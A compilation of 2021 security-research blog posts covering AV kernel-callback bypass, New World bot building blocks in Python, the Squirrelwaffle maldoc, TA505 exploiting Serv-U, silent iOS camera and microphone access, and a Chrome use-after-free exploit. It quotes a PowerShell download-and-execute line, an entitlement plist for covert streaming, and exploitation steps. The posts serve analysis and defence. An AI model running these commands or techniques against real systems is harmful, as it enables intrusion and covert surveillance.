In this blogpost, we took a look at a more advanced Anti-Virus product, consisting of multiple kernel modules and better detection capabilities in both user mode and kernel mode. We took note of the different AV kernel drivers that are loaded and the callbacks they subscribe to. We then combined the Evil driver and the Interceptor driver to disable the kernel callbacks and hook the IRP dispatch routines, before executing a custom shellcode injector to fetch a meterpreter reverse shell payload.

Even when armed with a malicious kernel driver, a good EDR/AV product can still be a major hurdle to bypass. Combining techniques in both kernel and user land is the most effective solution, although it might not be the most realistic. With the current approach, the Evil driver does not (yet) take into account image load-, registry- and object creation callbacks, nor are the AV minifilters addressed.

About the authors

Sander (@cerbersec), the main author of this post, is a cyber security student with a passion for red teaming and malware development. He’s a two-time intern at NVISO and a future NVISO bird.

Jonas is NVISO’s red team lead and thus involved in all red team exercises, either from a project management perspective (non-technical), for the execution of fieldwork (technical), or a combination of both. You can find Jonas on LinkedIn.

New World’s Botting Problem

Tenable TechBlog - Medium

James Sebree

11 November 2021 at 14:02

Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

Actual cheaters trying to take shortcuts and get ahead
People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a neverending game of cat and mouse. That said, there are plenty of legitimate tools out there that do make this a much safer option, such as running their screen watchers on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. What’s not to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but it takes much more effort and is more prone to false positives, which may be against the interest of the game studio if they were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

A way to capture a portion of the screen
A way to detect a specific pattern in the screen capture
A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss

while True:
    # 500x500 pixel region
    region=(500, 500, 1000, 1000)
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array

to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)

while True:
    # 500x500 pixel region
    region=(500, 500, 1000, 1000)

    # Grab region
    with mss.mss() as screen:
        img = screen.grab(region)
        mss.tools.to_png(img.rgb, img.size, output="sample.png")

    # Convert image to format usable by cv2
    img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)

    # Check if the tenable logo is present
    result = cv2.matchTemplate(img_cv, to_detect, eval('cv2.TM_CCOEFF_NORMED'))
    if((result >= 0.6).any()):
        print('DETECTED')
        break

Running the above and dragging a logo template into the region of the screen this is on will trigger the “DETECTED” message. To note, this code snippet may not work exactly as written depending on your monitor setup and configured resolution. There might be settings that need to be tweaked in some scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

What is Amazon doing in order to provide a solution to this issue? Honestly, who knows? The game is just over a month old at this point, so it’s far too early to tell how Amazon Game Studios plans to handle the botting problem they have on their hands. Obviously, we’re seeing plenty of players report the issues and many ban waves already appear to have happened. To be clear, botting in any form and buying/selling in-game resources from third parties is already against the game’s terms and conditions. In fact, there are slight mitigations against these forms of attacks in the game already, such as changing the viewing angle after fishing attempts, so it’s unclear whether or not further mitigations are under consideration. Only time will tell at this point.

As mentioned earlier, the purpose of this blog was not to call out AGS or New World for simply having this issue as it isn’t unique to this game by any stretch of the imagination. The purpose of this article was to shed some light on how basic many of these botting services actually are to those that may be unaware.

New World’s Botting Problem was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc.

McAfee Blogs

McAfee Labs

10 November 2021 at 18:13

Authored By Kiran Raj

Due to their widespread use, Office Documents are commonly used by Malicious actors as a way to distribute their malware. McAfee Labs have observed a new threat “Squirrelwaffle” which is one such emerging malware that was observed using office documents in mid-September that infects systems with CobaltStrike.

In this Blog, we will have a quick look at the SquirrelWaffle malicious doc and understand the Initial infection vector.

Geolocation based stats of Squirrelwaffle malicious doc observed by McAfee from September 2021

Figure1- Geo based stats of SquirrelWaffle Malicious Doc — Figure1- Geo-based stats of SquirrelWaffle Malicious Doc

Infection Chain

The initial attack vector is a phishing email with a malicious link hosting malicious docs
On clicking the URL, a ZIP archived malicious doc is downloaded
The malicious doc is weaponized with AutoOpen VBA function. Upon opening the malicious doc, it drops a VBS file containing obfuscated powershell
The dropped VBS script is invoked via exe to download malicious DLLs
Thedownloaded DLLs are executed via exe with an argument of export function “ldr”

Malicious Doc Analysis

Here is how the face of the document looks when we open the document (figure 3). Normally, the macros are disabled to run by default by Microsoft Office. The malware authors are aware of this and hence present a lure image to trick the victims guiding them into enabling the macros.

UserForms and VBA

The VBA Userform Label components present in the Word document (Figure-4) is used to store all the content required for the VBS file. In Figure-3, we can see the userform’s Labelbox “t2” has VBS code in its caption.

Sub routine “eFile()” retrieves the LabelBox captions and writes it to a C:\Programdata\Pin.vbs and executes it using cscript.exe

Cmd line: cmd /c cscript.exe C:\Programdata\Pin.vbs

VBS Script Analysis

The dropped VBS Script is obfuscated (Figure-5) and contains 5 URLs that host payloads. The script runs in a loop to download payloads using powershell and writes to C:\Programdata location in the format /www-[1-5].dll/. Once the payloads are downloaded, it is executed using rundll32.exe with export function name as parameter “ldr”

De-obfuscated VBS script

VBS script after de-obfuscating (Figure-6)

MITRE ATT&CK

Different techniques & tactics are used by the malware and we mapped these with the MITRE ATT&CK platform.

Command and Scripting Interpreter (T-1059)

Malicious doc VBA drops and invokes VBS script.

CMD: cscript.exe C:\ProgramData\pin.vbs

Signed Binary Proxy Execution (T1218)

Rundll32.exe is used to execute the dropped payload

CMD: rundll32.exe C:\ProgramData\www1.dll,ldr

IOC

Type	Value	Scanner	Detection Name
Main Word Document	195eba46828b9dfde47ffecdf61d9672db1a8bf13cd9ff03b71074db458b6cdf	ENS, WSS	W97M/Downloader.dsl
Downloaded DLL	85d0b72fe822fd6c22827b4da1917d2c1f2d9faa838e003e78e533384ea80939	ENS, WSS	RDN/Squirrelwaffle
URLs to download DLL	· priyacareers.com · bussiness-z.ml · cablingpoint.com · bonus.corporatebusinessmachines.co.in · perfectdemos.com	WebAdvisor	Blocked

The post The Newest Malicious Actor: “Squirrelwaffle” Malicious Doc. appeared first on McAfee Blog.

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

Fox-IT

Fox IT

8 November 2021 at 16:30

NCC Group’s global Cyber Incident Response Team have observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the mitigations section below

Execution

We observed that Base64 encoded PowerShell commands were executed shortly after the Serv-U exceptions indicating exploitation were logged. The PowerShell commands ultimately led to deployment of Cobalt Strike Beacons on the system running the vulnerable Serv-U software. The PowerShell command observed deploying Cobalt Strike can be seen below: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘hxxp://IP:PORT/a’))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled tasks named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID\. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and check these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds are describing follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content.

Check for altered RegIdleBackup task

Export-ScheduledTask -TaskName “RegIdleBackup” -TaskPath “\Microsoft\Windows\Registry\” | Select-String -NotMatch “<ClassId>{CA767AA8-9157-4604-B64B-40747123D5F2}</ClassId>”

Check for suspicious CLSID registry key content

Get-ChildItem -Path ‘HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

Check if your Serv-U version is vulnerable
Locate the Serv-U’s DebugSocketlog.txt
Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
- In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount	Country
1141	China
549	United States
99	Canada
92	Russia
88	Hong Kong
81	Germany
65	Austria
61	France
57	Italy
50	Taiwan
36	Sweden
31	Spain
30	Vietnam
29	Netherlands
28	South Korea
27	United Kingdom
26	India
21	Ukraine
18	Brazil
17	Denmark

Top vulnerable versions identified:

Amount	Version
441	SSH-2.0-Serv-U_15.1.6.25
236	SSH-2.0-Serv-U_15.0.0.0
222	SSH-2.0-Serv-U_15.0.1.20
179	SSH-2.0-Serv-U_15.1.5.10
175	SSH-2.0-Serv-U_14.0.1.0
143	SSH-2.0-Serv-U_15.1.3.3
138	SSH-2.0-Serv-U_15.1.7.162
102	SSH-2.0-Serv-U_15.1.1.108
88	SSH-2.0-Serv-U_15.1.0.480
85	SSH-2.0-Serv-U_15.1.2.189

MITRE ATT&CK mapping

Tactic	Technique	Procedure
Initial Access	T1190 – Exploit Public Facing Application(s)	TA505 exploited CVE-2021-35211 to gain remote code execution.
Execution	T1059.001 – Command and Scripting Interpreter: PowerShell	TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems.
Persistence	T1053.005 – Scheduled Task/Job: Scheduled Task	TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence.
Defense Evasion	T1112 – Modify Registry	TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry.

References

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211

[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211

[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/

How iOS Malware Can Spy on Users Silently

ZecOps Blog

ZecOps Research Team

4 November 2021 at 14:38

How iOS Malware Can Spy on Users Silently

Welcome to the first post of our latest blog series:

Mobile Attacker’s Mindset

In this blog series, we’re going to cover how mobile threat-actors think, and what techniques attackers use to overcome security protections and indications that our phones and tablets are compromised.

In this first blog, we’ll demonstrate how the recently added camera & microphone green/orange indicators do not pose a real security challenge to mobile threat actors.

Starting iOS 14, there are a couple of new indicators: a green dot, and an orange dot. These indicators signal when the camera or the microphone are accessed.

We are less worried about the phone listening to us, when there’s no green/orange dot.

Source: https://support.apple.com/en-in/HT211876

We know that malware like NSO/Pegasus is capable of listening to the microphone. Can NSO Group and hundreds of other threat actors that target mobile devices can take videos of us while the visual indicator is off?

Let’s examine if this feature poses any challenge to attackers.

Logical issues

Let’s first think about it. Is the indicator really on everytime the camera or microphone are accessed? We quickly think about Siri. How does the phone know when we say “Hey Siri” if the microphone indicator is not on all the time? The phone must be listening somehow right.

“Hey Siri”

/System/Library/PrivateFrameworks/CoreSpeech.framework/corespeechd relies on VoiceTrigger.framework to continuously monitor the user’s voice, and then activate Siri when a keyword is heard.

Accessibility -> VoiceControl

Voice control allows you to interact with the device using voice commands.

/System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/XPCServices/com.apple.SpeechRecognitionCore.brokerd.xpc/XPCServices/com.apple.SpeechRecognitionCore.speechrecognitiond.xpc/com.apple.SpeechRecognitionCore.speechrecognitiond

is responsible for accessing the microphone.

Accessibility -> Switch Control

Part of the SwitchControl function is to detect the movement of the user’s head to interact with the device. Very cool feature! It’s handled by:

/System/Library/PrivateFrameworks/AccessibilityUI.framework/XPCServices/com.apple.accessibility.AccessibilityUIServer.xpc/com.apple.accessibility.AccessibilityUIServer

and

/System/Library/CoreServices/AssistiveTouch.app/assistivetouchd

These features must access the microphone or camera to function. However, these features do not trigger the green/orange visual indicators. This means that mobile malware can do the same.

This means that by injecting a malicious thread into com.apple.accessibility.AccessibilityUIServer / com.apple.SpeechRecognitionCore.speechrecognitiond daemons attackers can enable silent access to the microphone. Camera access requires additional patch which we will talk about it later

Bypass TCC Prompt

TCC stands for “Transparency, Consent, and Control”. iOS users often experience this prompt:

The core of TCC is a system daemon called tccd, and it manages access to sensitive databases and the permission to collect sensitive data from input devices, including but not limited to microphone and camera.

Did you know? TCC prompt only applies to applications with UI interface. Anything running in the background requires special entitlement to operate. The entitlement looks like the picture below. Just kTCCServiceMicrophone is enough for microphone access.

Camera access is a little more complicated. In addition to tccd, there is another system daemon called mediaserverd ensures that no process with background running state can access the camera.

So far, it looks like an extra step (e.g. patching mediaserverd) is needed to access the camera in the background while the user is interacting with another foreground application.

Disable Visual Indicators For Microphone, Camera Access

First method is rough, using Cycript to inject code into SpringBoard, causing the indicator to disappear abruptly.

Inspired by com.apple.SpeechRecognitionCore.speechrecognitiond and com.apple.accessibility.AccessibilityUIServer, a private entitlement (com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus) that fits perfectly for our purpose! Unfortunately, this method does not work for camera access.

Accessing Camera in the Background by Patching ‘mediaserverd’

mediaserverd is a daemon that monitors media capture sessions. Processes that want to access the camera must be approved by tccd as well as mediaserverd. It is an extra layer of security after tccd. It also terminates the camera access when it detects an application is no longer running in the foreground.

Noteworthy, mediaserverd is equipped with a special entitlement (get-task-allow) to prevent code injection.

As a result of “get-task-allow” entitlement, dynamic debugger relies on obtaining task ports like cycript, frida do not work on the mediaserverd daemon. mediaserverd also gets killed by the system frequently when it’s not responding, even for a short time. It’s not common: these signs are telling us that mediaserverd is in-charge of something important.

When a process switches to the background, mediaserverd will get notified and revoke camera access for that particular process. We need to find a way to make mediaserverd do nothing when it detects that the process is running in the background.

Following a brief research we found that it is possible to prevent mediaserverd from revoking camera access by hooking into an Objective-C method -[FigCaptureClientSessionMonitor _updateClientStateCondition:newValue:], so no code overwriting is required.

To inject into mediaserverd, we used lldb. Lldb does not rely on task-port, instead it calls the kernel for code-injection. In reality, threat-actors that already have kernel code execution capabilities can replace the “entitlements” of mediaserverd to perform such injection.

POC source code is available here.

And on Mac…

From previous experiments back in 2015, the green light next to the front camera on a Mac, cannot be turned off using software only. Modifying the AppleCameraInterface driver and uploading a custom webcam firmware did not do the trick.The green light cannot be turned off since it lights when the camera is powered on. The light remains on as long as there’s power. Hardware-based indicators are ideal from a privacy perspective. We have not validated this on recent Mac versions / HW.

Demo

We made a demonstration, accessing the camera/microphone from the background process, and streaming video/audio using the RTMP protocol, steps:

Set up RTMP server
Compile mediaserver_patch, inject the code into mediaserverd
Compile ios_streaming_cam, re-sign the binary with following entitlements and run it in the background

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>com.apple.private.security.container-required</key>
    <false/>
    <key>platform-application</key>
    <true/>
    <key>com.apple.private.tcc.allow</key>
    <array>
        <string>kTCCServiceMicrophone</string>
        <string>kTCCServiceCamera</string>
    </array>
    <key>com.apple.security.iokit-user-client-class</key>
    <array>
        <string>IOSurfaceRootUserClient</string>
        <string>AGXDeviceUserClient</string>
    </array>
    <key>com.apple.private.mediaexperience.suppressrecordingstatetosystemstatus</key>
    <true/>
    <key>com.apple.private.mediaexperience.startrecordinginthebackground.allow</key>
    <true/>
    <key>com.apple.private.avfoundation.capture.nonstandard-client.allow</key>
    <true/>
</dict>
</plist>

By: 08Tc3wBB

Chrome Exploitation: An old but good case-study

Haboob

Haboob Research Team

2 November 2021 at 16:46

Since the announcement of the @hack event, one of the world’s largest infosec conferences which will start during Riyadh Season, Haboob’s R&D team submitted 3 talks. All of them got accepted.

One topic in particular is of interest for a lot of vulnerability researchers - browsers exploitation in general, and Chrome exploitation in particular. That said, we decided to present a Chrome exploitation talk which focuses on case-studies we’ve been working on. A generation-to-generation compression on the different era’s chrome exploitation has gone through. Throughout our research, we go through multiple components and analyse whether the techniques and concepts to develop exploits on Chrome has changed.

One of the vulnerabilities that we looked into, dates back to 2017. This vulnerability was demonstrated at Pwn2Own, specifically CVE-2017-15399. The bug existed in Chrome version 62.0.3202.62.

That said, let’s start digging into the bug.

But before we actually start, let's have a sneak-peak at the bug! The bug occurred in V8 Webassembly, the submitted POC:

Root Cause Analysis:

Running the POC on the vulnerable V8 engine triggers the crash, we can observe the crash context:

To accurately deduce which function triggered the crash, we print the stack trace at the time of the crash:

We noticed that the last four function calls inside the stack were not part of Chrome or any of its loaded modules.

So far, we can notice two interesting things, first, the instruction that triggered the bug was accessed on an address that is not mapped into the process. Which could mean that its part of JavaScript Ignition Engine. Secondly, the same address that triggered the crash is hardcoded inside of the Opcode itself:

These function calls were made from two RWX pages and got allocated during execution.

Since the POC uses ASM, the V8 compiles the asmJS module into an opcode using AOT (Ahead of Time Compilation) which is used to enhance performance. We notice that there’s hardcoded memory addresses that potentially could be what’s causing the bug.

A Quick Look Into asmJS:

For now, lets focus entirely on asmJS, and on the following snippet from the POC. We change the variables and function names in a way that could help us understand the snippet better:

The code above gets compiled into machine code using V8, its an asmjs which is basically a standard specified to browsers on how asmJS gets parsed.

When V8 parses a module that begins with use asm, it means that the rest of the code should be treated differently and then compiled into WASM (Webassembly Module). The interface for the asmJS function is:

So asmjs code, accepts three arguments:

stdlib: The stdlib object should contains references to a number of built-in functions to get used as the runtime.
foregien: used for user defined function
heap: heap gives you an ArrayBuffer which can be viewed through a number of different lenses, such as Int32Array and Float32Array.

In our POC the stdlib was a typed array function Uint32Array and we created heap memory using WASM memory using the following call:

memory = new WebAssembly.Memory({initial:1});

So, the complete function call should be as the following:

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer);

Now, V8 will compile asmjs module using the hard-codded address of the backing store of JSArrayBuffer for memory.

JSArrayBuffer is std::shared_ptr<> which is counting the references but the address it self was already being compiled into an offset inside the machine code generated. So the reference isn't counted when it's a raw pointer access.

Based on wasm specs, when a memory needs to grow, it must detach the previous memory and its backing store and then free the previously allocated memory. memory.grow(1); // std::shared_ptr<BackingStore> and we can see this behaviour in the file src/wasm/wasm-js.cc

Now the HEAP pointer inside the asmjs module is invalid and pointing to a freed allocation, to trigger the access we just need to call the asmjs.

if we look inside DetachWebAssemblyMemoryBuffer we can see how it frees the backing store:

after that, if we call asmjs module it will trigger the use after free bug.

The following comments should summarize how the use after free occurred:

WebAssemblyMemory

To investigate further into our crash point and attempt to figure out where the hardcoded offset comes from, we tracked down the creation of WasmMemoryObject JSObject that got created in WebAssemblyMemory. Which is a C function that got called from the following javascript line.

evil_f = module({Uint32Array:Uint32Array},{},memory.buffer); // we save a hardcode address to it

We set a break point at NewArrayBuffer which will call ShellArrayBufferAllocator::Allocate, this trace step was necessary to catch the initial created memory buffer (0x11CF0000h), afterwards we set a break on access on it (ba r1 11CF0000h) to catch any accessing attempt that will let us observe the crashing point before the use after free bug occurs.

After our on access break point was triggered, we inspected the assembly instructions around the break point. Which turned out to be the generated assembly instructions for the Asmjs f1 function in our original POC. We can see that it got compiled with Range checks to eliminate out of bounds accesses. We also noticed that the Initial memory allocation was hardcoded in the Opcode.

Executing memory.grow() will free the memory buffer but since it’s address was hardcoded inside the asmjs compiled function (dangling pointer), a use after free bug will occur. Chrome devs did not implement a proper check in the grow process for WasmMemoryObject, They only implemented a check for WasmInstance object and since in our case is asmjs, our object was not treated as WasmInstance object and therefore did not go through the grow checks.

Now we have a clear UAF bug and we'll try to utilize it.

Exploitation

Since the UAF bug allocated memory falls under old space, we needed a way to control that memory region. As this is our first time exploiting such a bug, we found a lot of similarities between Adobe and Chrome in terms of exploiting concepts. But this was not an easy task since that memory management is totally different, and we had to dig deeper into the V8 engine and understand many things like JsObject anatomy for example. The plan was layout on the assumption that if we created another Wasm Instance and hijack it later for code execution is gonna work, so our plan was like the following:

Triggering UAF Bug.
Heap Spray and reclaim the freed address.
Smash & Find Controlled Array.
Achieve Read & Write Primitives.
Achieve Code Execution.

Triggering UAF Bug:

Triggering the bug by calling memory function Grow() for the buffer to be freed. Doing so results with the freed memory region falling under old space, this step is important to reclaim the memory and control the bug. We allocated a decent size for WasmMemory to make sure that the v8 heap will not be fragmented

Heap Spray:

Thanks to our long journey of controlling Adobe bugs, this step was easy to accomplish but the only difference is we don't require poking holes into our spray anymore, since the goal is reclaiming memory. Using JsArray and JSArrayBuffer to spray the heap for achieving both Addrof and RW primitive later on.

Smash & Find:

In order to read forward from the initial controlled UAF memory, we first need a way to corrupt the size of our JsArrayBuffer to something huge. With the help of asmjs we can corrupt them and make a lookup function for that corrupted JsArrayBuffer index, and since we filled our spray with the number ‘4’ then it will act as our magic to search for in the asmjs. Writing an asmjs code is really hectic because of pointer addressing but once you get used to it, it will be easy.

We implemented a lookup function to search for a magic values in the heap:

A simple lookup implementation in JS could look like this, where we are looking for the corrupted array with value 0x56565656 in our spray arrays:

Now that we have an offset to an array that can be used to store JSObjects, we can achieve addrof primitive using the asmjs AddrOf function and use it to leak the address of JSObjects to help us achieve code execution. Please consider that you may need to dig a bit deeper into an object's anatomy to understand what you really need to leak.

We implemented our addrof primitive using the following wrappers:

Achieving Read & Write Primitives:

We are missing one more thing to complete our rocket, which is RW primitives and what we really want is corrupting JsArrayBuffer’s length to give us a forward access to the memory. Since the second DWORD of JsArrayBuffer header contains the length we searched for our size (0x40) and corrupted its length with a bigger size.

Achieving Code Execution:

At last, the final stage of the launch requires two more components. First component is as an asmjs function to overwrite any provided offset and this will help us achieve a primitive write by changing the JsArrayBuffer backing store pointer to an executable memory page:

The second is a wasm instance to allocate PAGE_EXECUTE_READWRITE in v8 to be hijacked by us. A simple definition could look like this:

Putting things together with a simple calc.exe shellcode:

That’s everything, we started with a simple PoC and ended up with achieving code execution :D

